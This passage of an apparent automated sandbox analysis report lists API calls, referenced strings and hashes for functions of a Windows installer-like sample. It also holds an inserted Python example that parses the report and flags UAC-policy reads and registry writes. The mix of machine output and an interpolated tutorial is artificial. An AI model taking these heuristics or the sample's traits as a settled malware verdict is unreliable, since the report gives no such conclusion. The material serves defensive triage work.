                                                              • Part of subcall function 008B8E44: lstrlenW.KERNEL32(00000100,?,?,?,008B9217,000002C0,00000100,00000100,00000100,?,?,?,00897D87,?,?,000001BC), ref: 008B8E69
                                                            • RegCloseKey.ADVAPI32(00000000,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008BB500,wininet.dll,?), ref: 008B907A
                                                            • RegCloseKey.ADVAPI32(?,?,?,00000000,?,00000000,?,?,?,00000000,wininet.dll,?,008BB500,wininet.dll,?), ref: 008B9087
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                              • Part of subcall function 008B0E4F: RegEnumKeyExW.ADVAPI32(00000000,000002C0,00000410,00000002,00000000,00000000,00000000,00000000,00000410,00000002,00000100,00000000,00000000,?,?,00898E1B), ref: 008B0EAA
                                                              • Part of subcall function 008B0E4F: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00898E1B,00000000), ref: 008B0EC8
                                                            Strings
                                                            Similarity
                                                            • API ID: Close$EnumInfoOpenQuerylstrlen
                                                            • String ID: wininet.dll
                                                            • API String ID: 2680864210-3354682871
                                                            • Opcode ID: 4347000f790c9de4e8af3dc9a42e3de030cfb0c311139dcb893c8d496e421259
                                                            • Instruction ID: 62d2352a29f0b58984580cb3de174227436c105e5c5f99abc018f6b324556ef1
                                                            • Opcode Fuzzy Hash: 4347000f790c9de4e8af3dc9a42e3de030cfb0c311139dcb893c8d496e421259
                                                            • Instruction Fuzzy Hash: 99312832C0152AEFCF21AFA8C9809EEBB79FF04710B514179EA50B6321C7319E52DB91
                                                            APIs
                                                              • Part of subcall function 008B8E44: lstrlenW.KERNEL32(00000100,?,?,?,008B9217,000002C0,00000100,00000100,00000100,?,?,?,00897D87,?,?,000001BC), ref: 008B8E69
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008B9483
                                                            • RegCloseKey.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000,00000000,?), ref: 008B949D
                                                              • Part of subcall function 008B0BE9: RegCreateKeyExW.ADVAPI32(00000001,00000000,00000000,00000000,00000000,00000001,00000000,?,00000000,00000001,?,?,0088061A,?,00000000,00020006), ref: 008B0C0E
                                                              • Part of subcall function 008B14F4: RegSetValueExW.ADVAPI32(00020006,008C0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0087F335,00000000,?,00020006), ref: 008B1527
                                                              • Part of subcall function 008B14F4: RegDeleteValueW.ADVAPI32(00020006,008C0D10,00000000,?,?,0087F335,00000000,?,00020006,?,008C0D10,00020006,00000000,?,?,?), ref: 008B1557
                                                              • Part of subcall function 008B14A6: RegSetValueExW.ADVAPI32(?,00000005,00000000,00000004,?,00000004,00000001,?,0087F28D,008C0D10,Resume,00000005,?,00000000,00000000,00000000), ref: 008B14BB
                                                            Strings
                                                            Similarity
                                                            • API ID: Value$Close$CreateDeletelstrlen
                                                            • String ID: %ls\%ls
                                                            • API String ID: 3924016894-2125769799
                                                            • Opcode ID: 41d07c87302c523e4fe7780abd768485b2bcf6229d2ae0c150399f6751847300
                                                            • Instruction ID: 43ed3289b890f655acadb0721546089a890e5266703317a0410667f817def8d9
                                                            • Opcode Fuzzy Hash: 41d07c87302c523e4fe7780abd768485b2bcf6229d2ae0c150399f6751847300
                                                            • Instruction Fuzzy Hash: 1C311772C0112EFF8F12AF98CC818DEBBB9FB04310B554166EA54B6221D7358E21EB95
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _memcpy_s
                                                            • String ID: crypt32.dll$wininet.dll
                                                            • API String ID: 2001391462-82500532
                                                            • Opcode ID: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                            • Instruction ID: eb84e22255826bd3709a5796ece6e153ad961b67b051e507a96e5d40dd1af286
                                                            • Opcode Fuzzy Hash: 0011009348c22b5e832ea82858c93897483b8e9d66932b506b87b8fd8fea0445
                                                            • Instruction Fuzzy Hash: 13118E71600219ABCF08DE19CC869AFBF69EF85290B14802AFD498B315D231EA10DAE1
                                                            APIs
                                                            • RegSetValueExW.ADVAPI32(00020006,008C0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0087F335,00000000,?,00020006), ref: 008B1527
                                                            • RegDeleteValueW.ADVAPI32(00020006,008C0D10,00000000,?,?,0087F335,00000000,?,00020006,?,008C0D10,00020006,00000000,?,?,?), ref: 008B1557
                                                            Strings
                                                            Similarity
                                                            • API ID: Value$Delete
                                                            • String ID: regutil.cpp
                                                            • API String ID: 1738766685-955085611
                                                            • Opcode ID: b6f63657468aab87109ee90be34f20ac41c9b1cd76b6b460f67b93038cd09ab7
                                                            • Instruction ID: 5d177d69a6a0f1636c15fa60fedb2af39cc4419e3e6a2755fb8851a7b8cd6662
                                                            • Opcode Fuzzy Hash: b6f63657468aab87109ee90be34f20ac41c9b1cd76b6b460f67b93038cd09ab7
                                                            • Instruction Fuzzy Hash: 5011A33695113AB7DF314A949C1DBEA7A68FB45BA0F950221BD02EE350E731CD2097E0
                                                            APIs
                                                            • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,IGNOREDEPENDENCIES,00000000,?,?,00897691,00000000,IGNOREDEPENDENCIES,00000000,?,008BB518), ref: 0087DE04
                                                            Strings
                                                            • IGNOREDEPENDENCIES, xrefs: 0087DDBB
                                                            • Failed to copy the property value., xrefs: 0087DE38
                                                            Similarity
                                                            • API ID: CompareString
                                                            • String ID: Failed to copy the property value.$IGNOREDEPENDENCIES
                                                            • API String ID: 1825529933-1412343224
                                                            • Opcode ID: b69b73b1595618a47e36c4358c0ce4f26c5ae1b9a8cf2c8a6f3460e8af51dc4e
                                                            • Instruction ID: 075c5909b35f87265843475031967dd7298919600703a366079c3a794e39baba
                                                            • Opcode Fuzzy Hash: b69b73b1595618a47e36c4358c0ce4f26c5ae1b9a8cf2c8a6f3460e8af51dc4e
                                                            • Instruction Fuzzy Hash: C5118F32204315AFDB225E58DC84FAA77B6FF54324F258179FA1CEB2A5C770E8508A90
                                                            APIs
                                                            • Sleep.KERNEL32(20000004,00000000,00000000,00000000,00000000,00000000,?,?,00888E97,?,00000001,20000004,00000000,00000000,?,00000000), ref: 008B566E
                                                            • SetNamedSecurityInfoW.ADVAPI32(00000000,?,000007D0,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00888E97,?), ref: 008B5689
                                                            Strings
                                                            Similarity
                                                            • API ID: InfoNamedSecuritySleep
                                                            • String ID: aclutil.cpp
                                                            • API String ID: 2352087905-2159165307
                                                            • Opcode ID: becd076e94535a185722479454ea80a96a113eacbfae07e7ee71673eca42a938
                                                            • Instruction ID: 6a3ae65732110e135259d37793126f588ade9858dd0f15de86262fe1eab5bfff
                                                            • Opcode Fuzzy Hash: becd076e94535a185722479454ea80a96a113eacbfae07e7ee71673eca42a938
                                                            • Instruction Fuzzy Hash: 6B015E33801929BBCF229E89CD05FDE7F65FF69750F064255BD04A6220C6729D20ABD1
                                                            APIs
                                                            • LCMapStringW.KERNEL32(0000007F,00000000,00000000,008870E8,00000000,008870E8,00000000,00000000,008870E8,00000000,00000000,00000000,?,00872318,00000000,00000000), ref: 008715D0
                                                            • GetLastError.KERNEL32(?,00872318,00000000,00000000,008870E8,00000200,?,008B52B2,00000000,008870E8,00000000,008870E8,00000000,00000000,00000000), ref: 008715DA
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorLastString
                                                            • String ID: strutil.cpp
                                                            • API String ID: 3728238275-3612885251
                                                            • Opcode ID: c4bd890d7a4d9868bae53cfce76f4f5f06467b94ddebf6a2bbe5ba19492558e3
                                                            • Instruction ID: 976136ebf43e5438f77007165db7d5d2e156a46aaec20308e75ccf93ae1794a6
                                                            • Opcode Fuzzy Hash: c4bd890d7a4d9868bae53cfce76f4f5f06467b94ddebf6a2bbe5ba19492558e3
                                                            • Instruction Fuzzy Hash: 3A01923394163667CF219E9D8C49E5B7A6CFF85B60B058224FE28EB254D660DC1087E1
                                                            APIs
                                                            • CoInitializeEx.OLE32(00000000,00000000), ref: 008857D9
                                                            • CoUninitialize.OLE32(?,00000000,?,?,?,?,?,?,?), ref: 00885833
                                                            Strings
                                                            • Failed to initialize COM on cache thread., xrefs: 008857E5
                                                            Similarity
                                                            • API ID: InitializeUninitialize
                                                            • String ID: Failed to initialize COM on cache thread.
                                                            • API String ID: 3442037557-3629645316
                                                            • Opcode ID: 29ed604f258ef1e8f1a62b69e35ec88797dd94936b0cae136b21d493d8c72446
                                                            • Instruction ID: 8f0c9bd1d89c48e374a4fd872b509f1e3337743d676af80d217edc5f156f764a
                                                            • Opcode Fuzzy Hash: 29ed604f258ef1e8f1a62b69e35ec88797dd94936b0cae136b21d493d8c72446
                                                            • Instruction Fuzzy Hash: 93016D7260061ABFCB059FA8D884DD6FBEDFF08354B008126FA19D7221DB70AD548BD0
                                                            APIs
                                                              • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
                                                            • RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008B3A8E,?), ref: 008B3C62
                                                            Strings
                                                            • EnableLUA, xrefs: 008B3C34
                                                            • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 008B3C0C
                                                            Similarity
                                                            • API ID: CloseOpen
                                                            • String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
                                                            • API String ID: 47109696-3551287084
                                                            • Opcode ID: fd97a7dd1cf3fdb34435aa8a3a28161a3671e87756a47fe563edf326a9245439
                                                            • Instruction ID: 29bd14b3dbaa56bc4315dd30ae4d0aaeb74c99c7a503aef053ab406610c8ff78
                                                            • Opcode Fuzzy Hash: fd97a7dd1cf3fdb34435aa8a3a28161a3671e87756a47fe563edf326a9245439
                                                            • Instruction Fuzzy Hash: 35017132910229FBD710AAA4C806BEEFBA8FB14721F2141A5A800F7251D3756F50D6D4
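The entry above is the one an analyst pivots on first: the sample opens SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System and reads EnableLUA, which is how a binary learns whether UAC is enabled before deciding how to elevate. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses the APIs, Strings and Similarity blocks of function entries in this format into records, and applies two triage heuristics of its own (an EnableLUA policy read, and registry-writing APIs such as the RegSetValueExW/RegDeleteValueW entry earlier on this page). The sample input is an excerpt copied from this report's own entries; the regular expressions, the Entry structure and the heuristic rules are this example's assumptions about the format, not a Joe Sandbox specification.

```python
import re
from dataclasses import dataclass, field


@dataclass
class Entry:
    """One function entry from the report: its APIs, Strings and Similarity blocks."""
    apis: list = field(default_factory=list)        # (api, module, ref, subcall_fn_or_None)
    strings: list = field(default_factory=list)     # (string, xref)
    similarity: dict = field(default_factory=dict)  # "API ID", "String ID", fuzzy hashes, ...


# "• RegCloseKey.ADVAPI32(args), ref: 008B3C62", optionally prefixed with
# "Part of subcall function 008B0F6C: " when the call sits in a callee.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-F]{8})$"
)
STR_RE = re.compile(r"^•\s*(?P<s>.*), xrefs: (?P<ref>[0-9A-F]{8})$")
KV_RE = re.compile(r"^•\s*(?P<k>[^:]+): (?P<v>.*)$")

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def parse_entries(text):
    """Split report text into Entry objects; each entry begins at an 'APIs' heading."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTIONS:
            if line == "APIs":
                cur = Entry()
                entries.append(cur)
            section = line
            continue
        if cur is None:
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append((m["api"], m["mod"], m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            cur.strings.append((m["s"], m["ref"]))
        elif section == "Similarity" and (m := KV_RE.match(line)):
            cur.similarity[m["k"].strip()] = m["v"].strip()
    return entries


def string_ids(entry):
    """The 'String ID' field joins several strings with '$'; split it back out."""
    sid = entry.similarity.get("String ID", "")
    return sid.split("$") if sid else []


# Triage heuristics below are this example's own assumptions, not Joe Sandbox signatures.
UAC_POLICY_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
REG_WRITE_APIS = {"RegCreateKeyExW", "RegSetValueExW", "RegDeleteValueW"}


def triage(entry):
    """Return short notes for an entry worth a second look."""
    notes = []
    sids = string_ids(entry)
    if "EnableLUA" in sids and UAC_POLICY_KEY in sids:
        notes.append(f"reads UAC policy value EnableLUA under {UAC_POLICY_KEY}")
    writes = sorted({api for api, _, _, _ in entry.apis} & REG_WRITE_APIS)
    if writes:
        notes.append("writes or deletes registry values: " + ", ".join(writes))
    return notes


# Constructed input: two entries copied from this report, dump-source block shortened.
SAMPLE = r"""
APIs
  • Part of subcall function 008B0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,008DAAA0,00000000,?,008B57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008B0F80
• RegCloseKey.ADVAPI32(00000000,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,00020019,00000000,?,?,?,?,?,008B3A8E,?), ref: 008B3C62
Strings
• EnableLUA, xrefs: 008B3C34
• SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, xrefs: 008B3C0C
Memory Dump Source
• Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
Similarity
• API ID: CloseOpen
• String ID: EnableLUA$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
• API String ID: 47109696-3551287084
• Instruction Fuzzy Hash: 35017132910229FBD710AAA4C806BEEFBA8FB14721F2141A5A800F7251D3756F50D6D4
APIs
• RegSetValueExW.ADVAPI32(00020006,008C0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0087F335,00000000,?,00020006), ref: 008B1527
• RegDeleteValueW.ADVAPI32(00020006,008C0D10,00000000,?,?,0087F335,00000000,?,00020006,?,008C0D10,00020006,00000000,?,?,?), ref: 008B1557
Strings
Similarity
• API ID: Value$Delete
• String ID: regutil.cpp
• API String ID: 1738766685-955085611
"""

if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print([api for api, *_ in e.apis], string_ids(e), triage(e))
```

Running the block prints one line per entry: the APIs it calls, the strings from its String ID, and any triage notes. Feed it the whole report text instead of SAMPLE to list every function that touches the UAC policy key or writes to the registry; the "ref" addresses let you jump straight to those call sites in the dump.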
                                                            APIs
                                                            • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00871104,?,?,00000000), ref: 00875142
                                                            • CompareStringW.KERNEL32(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00871104,?,?,00000000), ref: 00875172
                                                            Strings
                                                            Similarity
                                                            • API ID: CompareStringlstrlen
                                                            • String ID: burn.clean.room
                                                            • API String ID: 1433953587-3055529264
                                                            • Opcode ID: a3a8bca07bd416dca9b1cb240861694bf0390e6cce7e7aaaea3a1cc349547627
                                                            • Instruction ID: 280c127794d961de6a3e2837016cee144246d3ed5f7d21e138d6bb0e1b3cd48e
                                                            • Opcode Fuzzy Hash: a3a8bca07bd416dca9b1cb240861694bf0390e6cce7e7aaaea3a1cc349547627
                                                            • Instruction Fuzzy Hash: FE014F725016346E87248B489D84A63B7ADF715BA1B608316F50DD2614D7B1EC41C6A1
                                                            APIs
                                                            • SysFreeString.OLEAUT32(00000000), ref: 008B6985
                                                            Strings
                                                            Similarity
                                                            • API ID: FreeString
                                                            • String ID: `<u$atomutil.cpp
                                                            • API String ID: 3341692771-4051019476
                                                            • Opcode ID: 789b1c615e58d709cc4e8d6c469d511f8163a9b3649def5a9324eebd7b3b443f
                                                            • Instruction ID: d7ce30c6b8147e70f73d07a21ffa5c6f34f968ab4b86bcde2c542ad407ecb8f0
                                                            • Opcode Fuzzy Hash: 789b1c615e58d709cc4e8d6c469d511f8163a9b3649def5a9324eebd7b3b443f
                                                            • Instruction Fuzzy Hash: AC01A232400118F7D7215A988C01BFEBFB8FF54B70F244155B804E6350A7799E21A6E1
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?), ref: 00876534
                                                              • Part of subcall function 008B0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                              • Part of subcall function 008B0ACC: GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                              • Part of subcall function 008B0ACC: GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                              • Part of subcall function 00875CE2: RegCloseKey.ADVAPI32(00000000,?,00000000,CommonFilesDir,?,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion,00020119,00000000), ref: 00875D68
                                                            Strings
                                                            • Failed to get 64-bit folder., xrefs: 00876557
                                                            • Failed to set variant value., xrefs: 00876571
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressCloseCurrentErrorHandleLastModuleProcProcess
                                                            • String ID: Failed to get 64-bit folder.$Failed to set variant value.
                                                            • API String ID: 3109562764-2681622189
                                                            • Opcode ID: 63a12645d8c80fb275d6d50206ca41c62b07f4f353b5bad94d848fad050f3dad
                                                            • Instruction ID: 3835456be784812d888f305a585f2e70324a1f27eeb63069c0c9c23307d3a836
                                                            • Opcode Fuzzy Hash: 63a12645d8c80fb275d6d50206ca41c62b07f4f353b5bad94d848fad050f3dad
                                                            • Instruction Fuzzy Hash: 9B014F32D41628BBCB22AA98CD06ADE7B78FB00761F148155F804E6259E671DF60AA91
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,008710DD,?,00000000), ref: 008733E8
                                                            • GetLastError.KERNEL32(?,?,?,?,008710DD,?,00000000), ref: 008733FF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastModuleName
                                                            • String ID: pathutil.cpp
                                                            • API String ID: 2776309574-741606033
                                                            • Opcode ID: fedeba67a60564dc8a43d36e3d2da45b326066b6be688c0e0363168d97147fab
                                                            • Instruction ID: dd584c34f40cb10d9264cc7e7894fee43af211534bb9e0bdebf51a0e66a78f3a
                                                            • Opcode Fuzzy Hash: fedeba67a60564dc8a43d36e3d2da45b326066b6be688c0e0363168d97147fab
                                                            • Instruction Fuzzy Hash: 4DF02273A0553267C732569A6C48A8BFA58FB41B70B128231FD08FB204DAA0CD00A2E2
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0089EBD2
                                                              • Part of subcall function 008A1380: RaiseException.KERNEL32(?,?,?,0089EBF4,?,00000000,00000000,?,?,?,?,?,0089EBF4,?,008D7EC8), ref: 008A13DF
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 0089EBEF
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID: Unknown exception
                                                            • API String ID: 3476068407-410509341
                                                            • Opcode ID: 263e9e0d8ab62013017f6183c23edb980ec03f8565c548502f6176ee1679a6e6
                                                            • Instruction ID: 509f4facf89517e6e53a6177ad963073ef3fcf4f2119857738b21683ecd75c5e
                                                            • Opcode Fuzzy Hash: 263e9e0d8ab62013017f6183c23edb980ec03f8565c548502f6176ee1679a6e6
                                                            • Instruction Fuzzy Hash: F1F0283490020CB7DF00FAA8D80AD5C7B2CFA01320F584271F825E2AC1EB70E915C6D2
                                                            APIs
                                                            • GetFileSizeEx.KERNEL32(00000000,00000000,00000000,74DF34C0,?,?,?,0087BA1D,?,?,?,00000000,00000000), ref: 008B4A1D
                                                            • GetLastError.KERNEL32(?,?,?,0087BA1D,?,?,?,00000000,00000000,?,?,?,00000000,76EEC3F0,00000000), ref: 008B4A27
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorFileLastSize
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 464720113-2967768451
                                                            • Opcode ID: 1f262a9435dd4ab4e6b0397b826cbba950eb23de17a54e32e058a34e6758e84b
                                                            • Instruction ID: 5f5bb74f6154a2daf87f7d2d9c8b081efed7615d50242bf63f56ba7bd5501db7
                                                            • Opcode Fuzzy Hash: 1f262a9435dd4ab4e6b0397b826cbba950eb23de17a54e32e058a34e6758e84b
                                                            • Instruction Fuzzy Hash: 89F0AF72A4023ABB97209F8989069AAFBACFF04B20B01521AFD44E7300E770AD1087D5
                                                            APIs
                                                            • CLSIDFromProgID.OLE32(Microsoft.Update.AutoUpdate,00875466,?,00000000,00875466,?,?,?), ref: 008B3DA7
                                                            • CoCreateInstance.OLE32(00000000,00000000,00000001,008D716C,?), ref: 008B3DBF
                                                            Strings
                                                            • Microsoft.Update.AutoUpdate, xrefs: 008B3DA2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateFromInstanceProg
                                                            • String ID: Microsoft.Update.AutoUpdate
                                                            • API String ID: 2151042543-675569418
                                                            • Opcode ID: d0df3fd1283860ee8c7e0b9fba5a1f96c99d84678dcf874f44705f87a9823fd1
                                                            • Instruction ID: 6b9448a37028d4325b393af5255aeecfea9a5a485fae59d79c593f42ca94e473
                                                            • Opcode Fuzzy Hash: d0df3fd1283860ee8c7e0b9fba5a1f96c99d84678dcf874f44705f87a9823fd1
                                                            • Instruction Fuzzy Hash: D8F05471600608BBDB10EFA8DD05AEFB7FCFB08710F400266FA01E7250D7B1AE0486A2
                                                            APIs
                                                            • GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 008B0E28
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID: AdvApi32.dll$RegDeleteKeyExW
                                                            • API String ID: 190572456-850864035
                                                            • Opcode ID: 0c4c757738df04739c3aa33345c9004a7f502ceb16f04ff947f510862b0fde96
                                                            • Instruction ID: ba24885d0fa2fa019a33fff134c242c062f41800e6c80aad8e356836a9a7359c
                                                            • Opcode Fuzzy Hash: 0c4c757738df04739c3aa33345c9004a7f502ceb16f04ff947f510862b0fde96
                                                            • Instruction Fuzzy Hash: 51E0EC70943226DAC7115B15BC05B4A7F90F731B59F064367E415DA370D7B5C850CF91
                                                            APIs
                                                              • Part of subcall function 00D033C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,00D010DD,?,00000000), ref: 00D033E8
                                                            • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 00D010F6
                                                              • Part of subcall function 00D01175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00D0111A,cabinet.dll,00000009,?,?,00000000), ref: 00D01186
                                                              • Part of subcall function 00D01175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,00D0111A,cabinet.dll,00000009,?,?,00000000), ref: 00D01191
                                                              • Part of subcall function 00D01175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D0119F
                                                              • Part of subcall function 00D01175: GetLastError.KERNEL32(?,?,?,?,?,00D0111A,cabinet.dll,00000009,?,?,00000000), ref: 00D011BA
                                                              • Part of subcall function 00D01175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D011C2
                                                              • Part of subcall function 00D01175: GetLastError.KERNEL32(?,?,?,?,?,00D0111A,cabinet.dll,00000009,?,?,00000000), ref: 00D011D7
                                                            • CloseHandle.KERNEL32(?,?,?,?,00D4B4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 00D01131
                                                            Memory Dump Source
                                                            • Source File: 00000001.00000002.1726656645.0000000000D01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D00000, based on PE: true
                                                            • Associated: 00000001.00000002.1726562687.0000000000D00000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726726510.0000000000D4B000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726755586.0000000000D6A000.00000004.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000001.00000002.1726776597.0000000000D6D000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_1_2_d00000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                            • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                            • API String ID: 3687706282-3151496603
                                                            • Opcode ID: 806cfa0a7fce32abc47934e4653a73715e652a7414e2bc4660d7c2ea3cd051fa
                                                            • Instruction ID: f309fad5e526ce223d3b7d600f7c1769dd3c8668e2f15714c2fabecd3e4357e9
                                                            • Opcode Fuzzy Hash: 806cfa0a7fce32abc47934e4653a73715e652a7414e2bc4660d7c2ea3cd051fa
